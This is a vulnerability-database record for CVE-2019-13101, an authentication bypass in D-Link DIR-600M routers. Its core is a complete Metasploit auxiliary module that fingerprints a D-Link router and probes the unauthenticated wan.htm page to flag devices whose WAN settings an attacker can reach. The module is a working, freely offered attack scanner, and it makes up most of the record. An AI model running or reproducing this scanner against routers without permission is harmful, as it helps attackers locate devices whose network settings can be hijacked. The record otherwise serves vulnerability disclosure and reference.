ID
VAR-E-201908-0016
CVE
cve_id: | CVE-2019-13101 | Trust: 1.5 |
EDB ID
47250
TITLE
D-Link DIR-600M - Authentication Bypass (Metasploit) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-600M - Authentication Bypass (Metasploit). CVE-2019-13101 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dir-600m | scope: | - | version: | - | Trust: 1.6 |
vendor: | d link | model: | dir-600m wireless n home router access | scope: | eq | version: | 150 | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
'Description' => %q{
This module attempts to find D-Link router DIR-600M which is
vulnerable to Incorrect Access Control. The vulnerability exists in
wan.htm, which is accessible without authentication. This
vulnerabilty can lead an attacker to manipulate WAN settings.
This module has been tested successfully on Firmware Version
3.01,3.02,3.03,3.04,3.05,3.06.
},
'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
'CVE', '2019-13101'
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2019'))
register_options(
[
Opt::RPORT(80)
])
end
def run_host(ip)
res = send_request_cgi({'uri' => '/login.htm'})
if res.nil? or res.code == 404
print_error("#{rhost}:#{rport} - Host is down.")
return
end
if res and res.code == 200 and res.body =~ /D-Link/
print_good("#{rhost}:#{rport} - It is a D-Link router")
else
print_error("#{rhost}:#{rport} - Not a D-Link router")
return
end
res = send_request_cgi({'uri' => '/wan.htm'})
if res and res.code == 200 and res.body =~ /PPPoE/
print_good("#{rhost}:#{rport} - Router is vulnerable for
Incorrect Access Control. CVE-2019-13101")
else
print_error("#{rhost}:#{rport} - Router is with different firmware.")
return
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass (Metasploit)
Trust: 1.6
TAGS
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | Authentication Bypass / Credentials Bypass (AB/CB) | Trust: 1.0 |
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
CREDITS
Devendra Singh Solanki
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 47250 | Trust: 1.6 |
db: | NVD | id: | CVE-2019-13101 | Trust: 1.5 |
db: | EDBNET | id: | 101845 | Trust: 0.6 |
db: | PACKETSTORM | id: | 153994 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2019-13101 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/47250/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 153994 |
db: | EXPLOIT-DB | id: | 47250 |
db: | EDBNET | id: | 101845 |
LAST UPDATE DATE
2022-07-27T09:56:04.297000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 153994 | date: | 2019-08-09T20:21:38 |
db: | EXPLOIT-DB | id: | 47250 | date: | 2019-08-14T00:00:00 |
db: | EDBNET | id: | 101845 | date: | 2019-08-15T00:00:00 |